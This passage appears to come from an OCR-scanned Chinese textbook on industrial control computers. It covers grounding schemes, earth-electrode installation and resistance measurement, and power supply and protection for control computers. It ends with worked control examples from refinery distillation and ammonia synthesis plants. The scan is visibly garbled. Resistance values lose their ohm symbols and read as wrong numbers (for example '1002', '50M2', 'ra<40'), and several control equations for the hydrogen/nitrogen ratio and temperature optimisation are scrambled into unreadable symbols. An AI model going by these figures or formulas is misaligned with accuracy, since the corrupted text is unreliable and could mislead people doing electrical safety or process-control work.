为了保证全机浮置的“地”各点的电位相等,有的单位在机 柜下面铺设了一整块铜板(皮)把机器各部分的地连接起来,然 后与大地隔离浮置。机柜间要连紧并用编织多股铜线相连起来。 三、计算机机壳接地,其余部分浮空 采取这种形式的接地,根据国内目前计算机的生产情况来看,需事先向制造厂提出要求,以便在设计制造时把机壳与机器的逻 辑地隔离绝缘,才能保证逻辑地与大地浮置。使用时只将机壳接 地。这种方法比一、二两种方法都好,抗干扰能力强,安全可靠,但计算机制造时工艺较复杂, 一旦绝缘下降就会引入干扰。 国产的计算机还没有这种接法,由日本进口的 HOC-700E 属于这种形式的接地,其接地极电阻值为3.30。 接地引线约15~20米,用编织多股铜线φ10~15mm 引出。 逻辑地与大地的绝缘电阻为大于50M2。 四 、计算机的机壳与逻辑地隔离浮置后分别通过接地极接地 这种形式的接地是把计算机的机壳地与逻辑地分别通过小于1002和小于100的接地极接地。机壳的地能保证人身设备的安 全,而逻辑地则能防止干扰,保证计算机的可靠运行。这种接地 形式比较完善,效果好 五、计算机外部设备及发电机组的接地 这方面的接地均属于一般电力系统中的低压设备,请参照有关规定进行。 六、 双机与多机系统的接地 近年来,由于计算机网络的出现与发展,分级控制、企业管 理及双工系统的出现与应用,相应的也给计算机之间的通讯,资 源共享等提出了许多新的问题,接地与共地就是其中之一。 1。双机作为一机处理 例如A 机与B 机组成通讯系统,我们总是希望A地与B 地之 间的电位相等或电位差最小,以减少由此而产生的共模电压Ecm。 如图15-13所示。如果A 与 B 机采用同类型号的机器安装在一起完成系统的功能,那么问题就 简单多了,可视A 、B 为一机 考虑接地与共地问题。 2. 远距离的双机与多机 共地 如果两台以上的计算机相 距较远组成系统或网络,尤其 不同种类的机器共地问题就十 分复杂,如果浮空将是不可能的 。 因此,往往采用其他办法给予解决。 (1)各机器之间的数据通讯,通过隔离的办法把地分开, 例如采用光电隔离,变压器隔离等方法以间接的避开二机共地的 问题。 (2)采用无线信号通讯,组成计算机系统。 以上几种接地的形式,不管哪一种都应该注意以下几点: 1)模数转换器与机器浮置。 2)集中一点接地。 3)接地极要单独的,远离建筑物和避雷器的接地极。 4)接地电阻数应尽量小。 第四节 接地装置的工程实现 根据我国目前的情况一般都采用接地电阻ra<40 数值的接地 极,也可以参考国外有关规定进行。 一、接地电阻的计算方法 接地电阻的计算方法是根据土壤条件,选择接地极的形状等 有关条件进行的,但一定要保证接地电阻在一年四季里均应保证 阻值变化不大于计算值。这方面的内容,请参阅“电力工程设计 手册”。 二、接地极和连线的选择及安装 常用的人工接地体有垂直和水平埋入的钢管、角钢、槽钢、 圆钢及扁钢几种,也有采用环形、圆板及方板形的接地极。最常 见的是用40×40×4mzn 或50×50×5mm, 长2.5~3m端部削尖 垂直埋入地下的角钢作为接地极。然后用扁钢引到机房作为接地 母线,再用编织铜线与机器连结起来。 一般对接地极的要求如下: 1. 电阻数值在要求范围内。 2。有足够的机械强度。 3。耐腐蚀,应有足够的尺寸及防腐处理,例如镀锌。 在土质比较好的土壤中, 一般采用角钢就可以了。在坚硬的 土壤中使用钢管(φ19×2500mm)。采用角钢时。 为了保证接地电阻在要求的数值范围内,若使用一根接地体 达不到要求时,可相应地增加为2根、3根或更多根,直至达到 要求为止。每根接地体的距离约为5米。 在特殊要求的场合下,用一般接地极还不能达到保证的数值时,则可采用碳棒或铜板作接地极埋入地下。 三、接地电阻的测量 ( 一)概述 接地电阻的测量方法很多,通常有以下几种测量方法: 1. 真接测量法 使用专门的仪器进行测量,直接读取接地电阻的数值。这类 仪器较多,按测量原理可分为:电桥型、流比计型和电位计型三种。 比较新型的是半导体接地电阻测量仪,上海,牡丹江都有生产。 直接测量法,简单,方便,自己不必备有辅助设备。但它受 测量量程的限制,因此必须注意。 2。电流表-电压表测量法 这种方法最大的好处是它不受测量范围的限制,测量范围在 0.1~1000以上,尤其适用于测量小阻值的接地装置,如果其数 值不在直接测量仪器的量程范围内时,就一定采用这种方法。 但是这种方法比较麻烦,需要准备好独立的交流电源、辅助 接地极、接地棒和高阻电压表等设备仪器,测量以后,还需要经 过计算和电压校正才能得出准确的数据。 3. 其他测量方法 如电流表-电力表法、电桥法及三点法都能进行测量接地电 阻的数值,由于这些方法存在一些缺点, 一般不采用。 使用最多的方法是前两种方法,不管采用哪一种方法,在测 量时都要敷设两组辅助性质的接地极: 一组是用来测量被测接地 极与零电位间的电压的,称为接地棒;另一组是用来构成流过被 测接地极的电流回路的,称为辅助接地极。 在购买接地电阻测量仪时,接地棒和辅助接地极都成套供应。 如用其他方法测量时需自己制作。 辅助接地极 (B) 一般是由一根或数根钢管组成。直径约为 1~2英寸,长为2.5m 左右,钢管顶部有引线处,如用多根的则 需用扁钢连接起来,每根之间的距离为3~5m。 接地棒(Z) 一般为0.7~3m,φ25mm 的圆钢或25~50mm 钢管组成。但用圆钢较好。 被测接地极(X), 有一根或多根两种。 B 、Z 、X 之间的相互位置及距离,对于测量结果有很大的 影响。 一般的计算方法如表15-1所示。 在测量完毕以后,应校验其结果的正确性,将接地棒移置 A 、B 、C 三处重复进行测量,A 、B 、C 三点的位置一般为3~ 5m, 三次测量结果相等或相近,就证明测量结果是准确的,否 则就有问题,如果找不出原因就要增加a 的距离了。 测量时应注意: 1。要使用独立的交流电源,为了防止直流电在土壤中发生 的极化现象而影响测量结果,因此要使用交流电源。而为了使大 电流不影响其他设备,还要使用独立的交流电源。 2。不宜在阴雨天测量,防止测量误差大。 3。测量时,由于有相当大的电流流过辅助接地极 (B), 在 周围将产生跨步电压,因此,不要让人及动物靠近。 (二)测量原理及步骤 1. 使用电阻测量仪的原理: 一般采用的仪器有701型、MC-07 型、和半导体接地电阻测 量仪。现仅以701型为例加以简要说明。 测量原理如图15-17所示。 当K 在1位置时,调节可变电阻 R₄ 和互感线卷M, 使桥路平衡,当K 在2位置时,调节可变电阻R, 和互感线卷M, 使电桥平衡。 这种方法中,使用的电流表、互感器、精度不能低于1%, 电压表应为高阻抗的,如数字电压表或检流计等,而且要注意使 用量程。 测量步骤: 1. 将辅助接地极和接地棒打入地中,管端露出地面100~ 150mm, 若辅助接地极为多根的,应焊接起来。 2。连接测量回路,并检查接线、开关和熔断器的容量是否 符合要求。 3. 合上开关,调节可变电阻R 使之达到预定的电流值,若 达不到时,可增加辅助接地极的根数。 4。读取读数(电流、电压)。 5. 切断电源进行计算。 6. 连续重复3~4次取平均值。 7. 校验:用上述方法分别测出接地棒和辅助接地极的接地电 阻数值,来校验被测接地电阻的测量是否正确 第十六章 工业控制机系统的供电 第 一 节 概 述 工业控制机系统的供电主要包括:计算机的主机部分;外围 通道部分;外部设备及其他一些辅助设备(测量仪表、变送器、 操作台等。 供电的一般要求是: 1. 允许电网电压波动范围为±10%、频率变化范围为 ±1Hz。 2. 无瞬变干扰,如大电流的冲击等。 3. 采用电动机-发电机组时,要正确选择其发电机相数、电 压、电流、频率等数值以及控制屏内容。如有特殊要求(如调频调 压,加惯性飞轮等)均应在订货时提出。 供电的方法主要有以下几种: 1. 电网直接供电; 2。电动机-发电机组供电; 3. 静止型(调频调压无停电电源)供电; 4. 蓄电池供电。 第二节 主机的供电 一、电网直接供电 目前我国制造生产的许多电子计算机,如DJS-100 系列的计 算机均采用电网直接供电方式,经济简单,不需要电源设备。 图16-1为直接供电的示意图。其中包括AC220V和380V两 种。为了确保电子计算机的可靠运行,也可以采用无停电装置电 源。如果为了减少电网的干扰,也可以采取隔离的办法,稳压和滤波的办法, 一般使用隔离变压器,稳压器及低通滤波器实现。 电网供电方式,在一般的场合下都有二级自动重合闸,故问 题不大。 二、 电动机-发电机组供电 电动机-发电机组可供给计算机主机,外围通道及外部设备。 如果交流发电机不是50Hz 的,则磁鼓供电和外部设备的供电应 由市电供给。为了防干扰而一般外部设备的供电都由市电供给。 采 用 电 动 机 - 发 电 机 组 的 目 的 , 主 要 是 防 止 电 网 对 计 算 机 的 干扰,它起了隔离作用。如果需稳压、稳频(调压、调频)则还要 加以考虑增加这些设备。如果为了克服在0.5秒以内的停电则还 可以在电动机-发电机的连结处加惯性飞轮,这对主机的信息保 护或切换到备用电源上很有必要。电动机-发电机组一般是交流 发电机,分为单相和三相的;频率有50、400、1000Hz 三种;电 压有115V、230V 两种。 这种供电方法对保证计算机的稳定运行有显著的好处,但投 资大,需要有机房。如果采用非50Hz 的交流发电机时,又无备用机组则当机组发生故障时,需要停机。因此,有的单位采用 50Hz 发电机,则在机组发生故障时,用市电作为备用电源。 三、静止型电源装置的供电 近年来由于电子计算机、通讯传送设备、医院等提出稳频稳 压无停电电源装置的要求,使静止型电源装置供电的使用日益 广泛。 由市电供给的 AC 输入电压经过整流、直流滤波、可控硅调 制及交流滤波供给负载使用,其市电的频率及电压变化经过频率 发生器及电压控制进行稳定。同时市电通过充电装置向蓄电池贮 存直流电能。当市电发生故障时,由停电检出装置发出控制信号 给直流开关装置进行切换,此时,由蓄电池的直流电供给。供给 的时间长短由蓄电池的容量决定, 一般为5~30分钟,某石化总 厂一分厂的HOC-700E 电子计算机就采取这种供电装置。但注意 应采用碱性或中性蓄电池,不能使用酸性蓄电池。 这种电源的频率除50H₂ 以外,还有400Hz 的,可根据需要 选用。 为了提高供电的可靠性,可采取两套这样的装置(简称CVCF 电源)并联运行。 有的场合也可以用一台 CVCF 电源和一电动机-发电机组并 联运行互为备用,如图16-4所示。并联运行, 一路供主系统,另 一路供辅助系统,互为备用要注意容量的选择。 四、 善电池的供电 采用蓄电池供电对计算机来讲是最好的了,它具有电源电压 稳定,不受频率变化的影响,安全可靠,但造价昂贵, 一般不用。 以上谈的都是对计算机的交流供电而言的,而计算机需要的 是直流电源,有关交流电变为直流电的电源装置,都属于计算机 制造厂的范畴,这里就不介绍了。 第三节 外部设备的供电 计算机的外部设备主要包括:磁鼓存贮器、磁带存贮器、磁 盘存贮器、纸带输入机、穿孔机、卡片输入机、控制打字机、制 表机、X-Y 绘图仪等设备。它们一般都是由市电220V或380V 供电,各单位的使用情况和现场条件不同,选用的方法也有不同, 这里从略。 第四节 电 源 的 保 护 计算机系统的电源保护包括交流供电的保护和直流电源的保 护两种, 一般都采用了短路保护、过载保护、过压及欠压保护。 但有些计算机的电源保护的含义是:当计算机掉电时,需要 把内存及寄存器的信息加以保护。即在掉电时,机器产生中断信 号使计算机迅速的把信息保护好,经过一段延时,电源断掉。当 电源正常后,重新启动计算机,使程序由断点继续执行下去。 DJS-130 机具有电源监视装置和自恢复再启动装置。 一旦电 网电压异常,自行保护内存信息并停机。电源恢复时,自行启动, 重新投入按断电前程序继续运行。 第十七章 工业控制机在炼油化工生产中的应用实例 第一节 炼油厂常减压装置计算机应用实例 一、工艺流程概述 原油经换热后进入初馏塔进行分馏。塔顶馏出铂重整原料;塔底 油品经常压炉加热后进入常压塔进一步分馏。由常压塔顶馏出汽 油; 一线馏出航空煤油或灯用煤油;二线馏出催化裂化原料或柴 油;塔底重油经减压炉加热后进入减压塔进一步分馏。 该装置的工艺特点如下: 要求炼制几种不同的原油,需周期地切换;原油来源受运输影响,处理量经常有变化,且变化较大; 常压各线产品的质量要求较宽, 一般均可合格; 要求计算机在提高操作平稳性方面多做工作。 以下简要介绍该厂使用电子计算机的几项控制方案。 二、复合串级控制 加热炉的温度控制,通常都是每分路出口温度与相应的炉膛 温度串级控制,而总出口温度不控制。该厂的常压炉采用大型圆 筒炉,由于四路的炉膛连在一起,各分路之间的互作用干扰严 重,致使总出口温度波动超出±1℃,影响了常压塔的平稳操作。 现使用电子计算机进行复合串级控制,将四个炉膛的温度测量并 联为一个总炉膛,总出口作为主回路。同时,各分路出口温度也 有给定,以保持各分路之间的温差不要过大。控制流程图见图17- 2所示。控制方框图见图17-3所示。 通过理论计算可得到如下结果: 1. 复合控制后的各分路自身传递系数与复合前的系数正负 号相同,数值变小。因而能在调节品质不变的情况下,提高稳定 性;或在保持原来稳定性的前提下,提高调节品质。 2. 采用复合控制,可以减小互作用干扰。 采用复合串级控制后,加热炉总出口温度的波动,将可维持 在±1℃以内。 三、塔底液面控制 常减压装置主要有三个塔,即初馏塔、常压塔和减压塔。塔 底液面是各塔热量平衡和物料平衡的集中结果。同时,初馏塔塔 底油品,又是常压塔的进料;常压塔塔底油品,又是减压塔的进 料。若单纯强求塔底液面平稳,则下一塔的进料势必波动较大; 若单纯强求流量平稳,则塔底液面将会波动较大,都会影响正常 的操作,甚至会影响产品的质量。 一般的常规控制系统对这方面 缺乏有效的控制手段。 为此,在初馏塔和常压塔的塔底液面上采用了带死区的PI 控 制。即当液面测量值在预先设定的上、下限之间时,输出增量为 0;当液面测量值超出上、下限时,按一般PI 规律进行控制。同 时,初馏塔塔底液面与原油进料流量串级,即保证主分馏塔—— 常压塔的进料稳定。常压塔塔底液面则与塔底产品(即减压炉进 料)串级,即常压塔塔底液面和塔底产品流量均允许有一定的波 动。而减压塔塔底液面则不设置死区,按一般控制规律进行控制。 控制流程如图17-4所示。这种综合性的控制系统,用电子计算机 实现是比较方便的。 三个液面主要用比例控制。这与一般流量控制主要靠积分控制不同。 此外,液面还有报警的上、下限值,超限时进行声光报警, 输出增量为0,由操作人员进行处理。 四 、前馈-反馈控制 由于减压炉进料量受常压塔塔底液面综合控制,因此经常波 动。而减压炉进料量的波动将影响炉出口温度也产生波动,因有 一定的纯滞后时间,仅使用反馈控制是稳定不好的。为此,在减 压炉出口温度控制回路中,加入进料量的前馈控制。这样,进料 量虽不断波动,而炉出口温度仍可维持在±1.5℃的水平。 常压炉出口温度的干扰因素为瓦斯压力的波动。因此在常压 炉出口温度控制回路中加入瓦斯压力前馈控制环节。 在使用前馈控制时,各种参数无法测得很准,同时参数本身 也随工艺条件而变化,当参数误差太大时,反而会人为引入干扰, 使控制效果还不如纯反馈。因此在使用中,最好注意先将反馈系 统整定得较好、较稳定后,再由欠补偿开始逐步加大前馈量。 五、 常压静态质量控制 该控制方案是一种以产品质量为目标的综合最优控制模型。 这里介绍对常压塔各线产品质量采用的综合静态闭环控制方案。 该厂常压塔的产品中,塔顶汽油有时产量甚小(馏出率< 0.5%),而且质量方面不需要严格控制;主要产品一线航空煤油 只要将其初馏点和干点控制在一定范围之内,就可以保证质量; 二线产品的质量指标为350℃馏出百分数。该厂这三项质量指标 均配有在线质量分析仪表。 常压塔的主要控制变量为一线温度、 一线流量和二线流量。 质量仪表的采样信号经限幅、限速、递推平均等数字滤波 后,引入计算机。同时,在进行闭环控制时,作如下规定: 1。调节周期 由于系统的滞后大、反应慢,故调节周期选 为30~60分钟,视处理量大小而定。 2. 工况稳定判断 工况波动时,主要矛盾是稳定工况。此 时质量调节无意义,因此不进行质量调节。选择一个关键性的自 变量指标(如一线温度)作为判断工况是否稳定的标准。如其波 动超出一定的范围,则认为工况不稳,不进行质量调节。该波动 范围由实验确定。 3. 质量指标的合格范围 各因变量yi, 除设定给定值外, 尚需设定合格范围,在此范围内虽与给定值有偏差,但因质量仍 然合格,因此不进行调节,以尽量保持工况稳定。此合格范围一 般应比工艺生产所规定的合格范围严一些。例如,工艺规定干点 指标为给定值的±2℃时为合格,则质量调节选用的合格范围 为±1℃。 4. 调节量的限幅 为防止质量偏差较大时,调节幅度过度, 打乱操作,因此各自变量的调节量均有限幅。限幅应选择适当, 限幅太小时不但调节不起作用,而且会使方程组的系数不起作 用,变成限幅调节。 一般限幅值应随处理量的变化作适当修改。 六、减压静态质量控制 减压静态质量控制的目的是使减压四个侧线油品的主要质量 指标——粘度,达到并保持合格。该厂在减压四个侧线均装有在 线粘度自动分析仪。 该厂减压塔的主要控制变量为常压二线流量及减压一、二、 三侧线的馏出流量。 但当减压一线粘度不合格,而减压方面再无控制手段时(即减压一 线馏出流量已达上、下限值),可开环建议常压二线在其本身质量 允许的范围内,考虑x₀ 有 一 个变化量,使减压 一 线粘度合格或接 近合格。 此外,当减压二(三)线馏出流量值调节到最大允许值时, 若减压二(三)线粘度仍不能合格,再回过头来看减压 一 (二) 线流量能否再加以调节,在保证减压 一 (二)线粘度合格的前提 下,使减压二(三)线粘度也能合格或接近合格。这项控制是自动进行的。 七、加工方案自动切换 由于炼制的是多种原油,且有多种加工方案,现采用计算机 进行加工方案自动切换。此方案基本上以实验为基础,目标是快 速、平滑、简单和正确地进行切换,而并不苛求切换至“最佳” 条件。在切换完毕后,再根据各线产品的质量情况进行质量调节。 当采用计算机进行加工方案自动切换时,只需要在外操作台 上设定三个数据: 1。原油操纵站起始换阀时间(如几点几分); 2。处理量和切换方案代号(如5504表示处理量为5500t/ day, 切换方案代号为4); 3。 一线温度的新给定值。 该方案实际上是一个由电子计算机指挥的顺序控制过程。 当切换过程开始后,正常的质量控制立即中断执行。切换完 毕后打印出切换完毕时间,并立即转至正常的质量控制程序。 八、 自动提降处理量 处理量变化时,需要变更的参数主要是各塔的进料量和各线 产品的馏出流量,以及保持各塔塔底的液面稳定。而各点温度的 给定值几乎不需要变动。 在工艺设备、测量仪表、控制执行机构均位于可操作区域内 时,涉及流量参数的各给定值均可按处理量的提降量按比例增 减。如日处理量为5000t/day, 当时的常压一线的馏出口流量的 给定值为25t/h, 则若处理量增为6000t/day 时(即增为1.2倍), 常压一线的给定值应该提到25t/h 的1.2倍,即30t/h。 由电子计算机执行自动提降处理量,就是根据新、旧处理量 的变化幅度按照一定次序和周期变更有关进料、馏出、回流量的 给定值。这也是一种由电子计算机指挥的顺序控制过程。 同样,执行自动提降处理量的程序时,质量控制程序立即中 断执行,执行完自动提降处理量程序、工况平稳后再运行质量控 制程序。 第二节 炼油厂常压装置计算机应用实例 一、控制方案概述 常压蒸馏工艺流程。原油经换热后进入初馏塔进行预分馏。塔顶馏出的轻汽油作 为铂重整原料。塔底油品经加热炉加热后进入常压塔进一步分馏。同时,从初馏塔侧线抽出一部分馏分,经冷却后打入常压塔 第十三层塔盘作为冷进料 (Fia) 。 此外,常压塔中部还有一个回 流通路(中段回流F中)。由塔下部吹入蒸汽(汽提蒸汽)。 进入常压塔的油品被分割成塔顶汽油、塔底重油及一线、二 线、三线、四线、五线共五个侧线油品,共计七种成品和半成品。 由于待分馏的油品组分复杂,相邻侧线油品的馏分互有重叠, 导致相互关联,使得常压塔难以调节稳定。尤以一线油品的质量 调节最为困难。 本控制方案的目标是保证常压塔一线产品航空煤油的质量合 格。评价航空煤油质量是否合格的主要指标是其比重、冰点和馏 程。根据该厂的工艺条件,只要将航空煤油的比重控制在一定的 范围内,就能保证其他指标均合格。因此本控制方案的被控变量 为航空煤油的比重,采用了一个常压塔多变量前馈-反馈控制方 案。其前馈输入变量为: 1. 常压塔塔顶压力P, 即前馈变量D; 2. 十三层进料量F₁s, 即前馈变量Dz; 3. 中段回流取走的热量Q中,即前馈变量D₃; 4。常压塔进料温度tr, 即前馈变量D₄; 5. 汽提蒸汽的重量流量2,即前馈变量Ds。 由于常压塔影响航空煤油比重的因素远非以上五今,又由于 目前的前馈控制方案还难以适应各种不同的工况,因此,为了严 格控制航空煤油的比重,在五个变量前馈的同时,还必须设置一 个比重和塔顶回流构成串级的反馈控制回路。这就是常压塔多变 量前馈-反馈控制系统。其控制变量为塔顶回流量R。 二、 数学模型简述 为了建立多变量前馈模型,首先应获取以上各前馈变量至被 控变量(比重d) 的通道特性,其后,并须获取调节通道 (R-d) 的特性。按不变性原理(即在航空煤油比重不变的条件下), 可得以下函数关系:R=f(D₁,D₂,D₃,D₄,D₅) (17-3) 由于目前尚难完全弄清其具体的函数关系,按工程上广为采 用的近似处理方法,在稳定工况附近,将以上通道特性予以线性化,并经适当处理,使之相互独立,则可按线性叠加原理得到多 变量前馈的模型。其离散化的Z 变换形式为: R(Z)=Gr(Z)·P(Z)+Gt₂(Z)·z(Z)+Gr₃(Z) · Q中(Z)+Gr₄(Z)·tp(Z)+Ges·Fi₃(Z) (17-4) 第三节 合成氨装置计算机应用实例一 一、工艺流程概述 以褐煤和重油为原料,进行气化反应得到半水煤气。经脱硫、 变换后,与脱氧后的低压氮气以适当的比例混合,得到质量合乎 要求的氢氮混合气,进入压缩提压(或者将氮气加压后进行高压 配氮)。经铜洗后得到精制的氢氮混合气(新鲜气),在新鲜气中还 包含少量的甲烷、氩气及微量的CO₂ 和CO 等。新鲜气送入合成系 统进行氨的合成。氨合成工艺流程是根据制气量的多少,分别采 用多机组并联的单循环流程;或者是多机组并联与某一机组的串联构成双循环流程生产。 在合成塔内,氢和氮在一定的温度和压力下,经铁触媒的催 化作用生成氨。这是一个可逆反应。反应后的混合气进入水冷器 和氨分离器,进行一次冷凝和分离,把液氨送入氨库。余下的混 合气,为了减小其中惰性气分压,不定期进行放空,小部分并作 为二循环的原料气,进入二循环再生产。大部分进入循环机提压 后去冷凝塔和氨蒸发器进行二次冷凝和分离。二次冷凝的温度高 低,对氨产量有很大关系。剩下的余气与补充的新鲜气混合后, 作再次循环。 以下介绍该厂计算机控制的三套数学模型。 二、氢氮比最佳控制 该方案将进入合成塔的原料气中之氢氮比控制在最佳值3附 近,使得氨生成率提高,以增加氨产量。 工艺上N₂是在新鲜气处加入的,而真正参加反应的是循环 气。因此由工业色谱仪于合成入口处测定循环气的实际氢氮比值, 由计算机与给定值进行偏差运算,并计算出H₂ 浓度的最佳给定 值。同时根据水洗出口的氢浓度在线自动分析仪所测得的 H₂ 浓 度,对系统的加N₂流量进行串级调节。氮流量的调节采用常规 DDZ-I 型仪表。这是SCC的控制方式。 由于只用一台色谱仪进行多塔多组分轮流分析,每个合成塔 的氢氮含量要44分钟才能分析一次,对循环气氢氮比控制带来困 难。考虑到各塔氢氮含量虽有差异,但各塔成分的变化趋势基本 相同,因此采用按时间加权求取氢氮比值作为被控参数。 由于水洗出口H₂ 的浓度变化影响到合成循环气中氢氮比变 化要经三十几分钟的纯滞后,因此将水洗出口H₂ 成分讯号送入 计算机进行超前补偿。 该方案实际上是采用了考虑到干扰的搜索法反馈控制并带有 选择性控制的一个综合控制方案。其控制方程如下: Hgn=Hga-i+Sign(Rg-Rm)Yg·△Hg 式 中 -Sign(H₄-Ha-)Yn·△H Hgm——第n 次水洗H₂ 的给定值;(17-27) Hgn-1——第n-1 次水洗H₂ 的给定值; H₀—— 第n 次水洗H₂ 的采样值; H₀-₁—— 第n-1 次水洗H₂ 的采样值; Rg——循环气H₂/N₂ 比值的给定值; R■——循环气H₂/N₂ 比值的采样值; Yr——反馈控制的决策系数,取值0或1; Yn—— 超前补偿的决策系数,取值0或1; △Hg——反馈控制的输出步长; △Hy——超前补偿的输出步长; Sign(a-b)—— 取(a-b) 的符号。 其反馈调节周期为Tx, 超前补偿周期为TH, 决策系数Yμ、 YH和输出步长△Hg、△H 均是根据选择条件决定的。选择条件 如下: (一)当时间t=iTn, 而t≠jT 时,取Ya=0 。 即 只 进 行 搜索法反馈控制(i,j 为正整数)。 1. 当 |Rg-Rm|≥C₁ 时 取 Yg=1,△Hg=△H 则 Hgn=Hgn-i+Sign(R₈-Rm)△HgI (17-28) 2. 当C₀<|Ra-Rm|<C₁ 时 取 Yg=1,△H,=△Hgn 则 Hgn=Hm-,+Sign(Rn-Rm)△Hgo 3. 当 |Rg-Rm|≤C₀ 时 取 Y= 则 Hgn=Hgn-₁ (即不修改给定值) (17-29) (17-30) (二)当时间t=kT, 而t=lTg 时, 取Ya=0 。 即只进行搜索法超前补偿 (k,l 为正整数)。 1. 当H₀-H ≥Y% 时 (1) H≥Hw 时 取 Yn=1,△Hn=△Hm 则 Hm=Hgm-₁-Sign(Hn-H₀-)△HH (17-31) (2)H₁<Hn<Hy 时 取 Y₁=1,△H=△Hm 则 Hg₀=Hn-i-Sign(H₀-H₀-)△Hno (17-32) (3)H₁≤H₁ 时 取 Ya=0 则 Hgn=H-, (即不修改给定值) (17-33) 2.Hn-₁-H₁≥Y% 时 (1)Hn≤Hm 时 取 Ya=1,△Hu=△H 则 Hm=Hgm--Sign(H₀-H₀-)△H (17-34) (2)Hm<Hn<Hg 时 取 Yi=1,△Hg=△Hgo 则 Hg=Hgm-l-Sign(H₀-H-)△Hgo (17-35) (3)Ha≥H₃ 时 取 YR=0 则 Hn=Hg-, (即不修改给定值) (17-36) (三)当时间t=mTg=pTg 时,(一)与(二)相加即可。即 进行反馈控制加超前补偿。 其中 H₁=68.5% Hm=69.5% Ha=71% γ=0.5 △Hgi、△Hgo——步长,由试验确定。 目前取 △Hg₁=0.25~0.5mA;△Ho=0.02~0.05mA。 最后,由 △u₀=K₀(en-en-l)+K(ea+Kp(ea-ea-l+en-2) (17-37) 得到对加氮控制阀的增量输出值。 其中 ea=Hn-H K. 、K; 、Ka 为PID 参数。 三、 氨蒸发器出口循环气温度最佳控制 氨蒸发器出口循环气温度T, 是合成工段工艺上的一个重 要操作参数。氨蒸发器内加入液氨,液氨蒸发时吸热,使通过其 内盘管中的循环气中的气氨冷凝下来。因此T, 越低,气氨冷凝 效率越高,再度进入合成塔内的气氨就越少,合成效率就越高。 但在该厂的具体工艺条件下,考虑到整个工艺系统的相互关联, 对T。的降低加了以下三个限制条件: (一)受合成塔出口温度最大值的限制。这是由工艺确定的 上限值; (二)受合成塔触媒层温度调节冷气阀最大开度的限制; (三)受气氨蒸发压力的限制,同时受到氨蒸发器最高液面的限制,即不允许把液氨带到气氨主管中去。 相应的数学模型方程式为: (Tx-T≈n±△T)-Z≥0 Ta—— 合成塔出口温度第n 次采样值; Tmax——合成塔出口温度工艺规定上限值; T*Bn——T*的 第n 次最佳给定值; T*Bn-1 —T 的 第n-1 次最佳给定值; △F#m——第n 次新鲜气增量; 6mzx——副阀最大开度; 0₁——第 n 次副阀开度采样值; Txo' 气氨温度第n 次采样值; △T——仪表测量误差; Z—— 修正系数; K—— 比例系数; a₁ 、az、b₁ 、b₂ 、a、b、c—— 待定系数。 式(17-38)为合成塔出口温度约束,其中b₁AFm 为考虑到新 鲜气增量干扰的修正部分。 式 (17-39)为触媒层中层温度调节副阀开度约束,其中 b₂△Fa 为考虑到新鲜气增量干扰的修正部分。 式(17-40)为气氨压力P 的约束。 P 与气氨温度T 的函数 关系近似为: T=aP²+bP+C (17-42) 因此,式(17-40)实际上也可以写成: T*Bn=K(T~-Tra)+TBa-1 (17-43) 式中 T 气氨温度的理论计算值。 在正常情况下,由(17-38)、(17-39)、(17-40)式计算出最 佳给定值,进行监督控制,再由计算机以PID 规律进行直接数字 控制(DDC): △Un=K(en-en-)+K;en+Ka(T₄-2Ta-i+Ta-2) U₄=U₀-₁+△U en=T·m-T 四、 二循环吹出气最佳控制 二循环吹出气计算机控制的主要目的,是在保证设备安全和 二循环能维持正常生产的条件下,尽量减少吹出量。这样,有利 于降低消耗定额,增加产量。 减少吹出量受以下两个条件的约束: (一)受压缩机六段出口压力最大值 PgH 的限制,这由工艺 根据设备安全情况确定; (二)受二循环气中惰性气体含量最大值 Am 的限制,这由二循环塔能否正常生产的条件确定。 由于系统压力越高,合成率就越高,氨产量也就越高。因此 该方案应保证在以上两个约束条件下,尽量提高压力。 曲线 a 为高负荷的情况,曲线b 为低负荷的情况。可见c、 d 两点各为最佳工况。因此高负荷时主要根据压力的条件进行控 制;低负荷时主要根据Am进行控制。 控制方程如下: △un=K,(en-en-i)+Kren+Ku(Pa-2Pa-₁+Pa-2) (17-48) Un=Un- 1+△Un (17-49) ea=P₆g-P₆₀ (或AmB-Am) (17-50) 第四节 合成氨装置电子计算机应用实例二 一、工艺流程概述 该厂合成氨生产的原料氢气是由重油裂化产生的 。 在裂化工段,重油、氧气、水蒸汽一同进入裂化炉,在高温下(1350℃) 进行裂化反应。当氧量与重油量之比(氧油比)及蒸汽量与重油量之比(蒸 汽油比)合适时,可得到氢气的产率最高,而无用的CH₄ 产率最 低。同时,加氧量还影响着裂化炉的温度。在此情况下采用了重 油裂化系统的综合控制,在满足炉温与CH₄ 含量适当并稳定的约 束条件下,使氢气的产率最高。 在合成工段,为保证合成氨的效率最高,采用了对氢氮比进 行综合控制的方案。 下面介绍这两个主要的控制方案。 二、重油裂化系统的综合控制 在该控制系统中,裂化炉的进料:重油、氧气、蒸汽,均根 据各自的流量检测进行单回路PID 调节,以保持平时各流量的稳 定。其中重油流量是经过比值计算而得到的。蒸汽油比之值是由 人工给定的;而氧油比之值除由人工给定外,还要从两个方面进 行自动修正。其一是由炉温进行修正;其二是由CH₄ 含量进行修 正。即当炉温有变化时,与人工给定的炉温进行偏差计算后,乘 以一个人工给定的修正常数 Kr, 然后去修正人工给定的氧油比 使得炉温恢复到稳定值。当CH₄ 含量有变化时,也与人工给定的 CH₄ 含量进行偏差运算后,乘以一个人工给定的修正常数K₄, 也 去修正人工给定的氧油比,使得CH₄ 含量恢复到合适的稳定值 (从炉温方面来的修正与从CH₄ 方面来的修正,对于氧油比的作 用是相反的)。 可见,此控制系统中既有单回路控制,又有比值控制,控制 的目的不仅使各调节量平稳,且使炉温、CH₄ 含量适当为总目标。 故该厂称其为综合控制。 重油裂化系统的综合控制系统图如图17-16所示。其中,甲烷 (CH₄) 的含量信号来源为一甲烷含量在线自动分析仪。各人工给定的数值,均由工艺决定,或由实验确定。 三、合成系统的氧氮比综合控制 该厂合成氨用的氢气,由造气车间提供,称为精制气。然后与氮气相混合,并与循环氢气混合进入合成塔进行反应。该控制 方案是在混合气处测得流量信号,由在线自动分析仪测得氢气成 分,送入计算机后计算出相应的氢气流量,再根据预先给定的氢 氮比值计算出适当的加氮流量值,以此作为给定值对加氮流量进 行PID 调节。氢氮比值可由人工改变。 由于该厂的循环气量(约70,000m³/h) 远大于新鲜气量(约 20,000m³/h), 因此循环气中实际氢氮比值的改变是不可忽视 的。这种改变是由于合成温度及放空等因素的影响造成的。为了 对这种改变加以修正,在合成塔入口处装有氢气在线自动分析仪 及色谱自动分析仪,检查进入合成塔的原料气的氢氮比值。如不 合适,则自动修正氢氮比值的给定值,以便改变加氮量,使进入 合成塔的原料气配比合适。 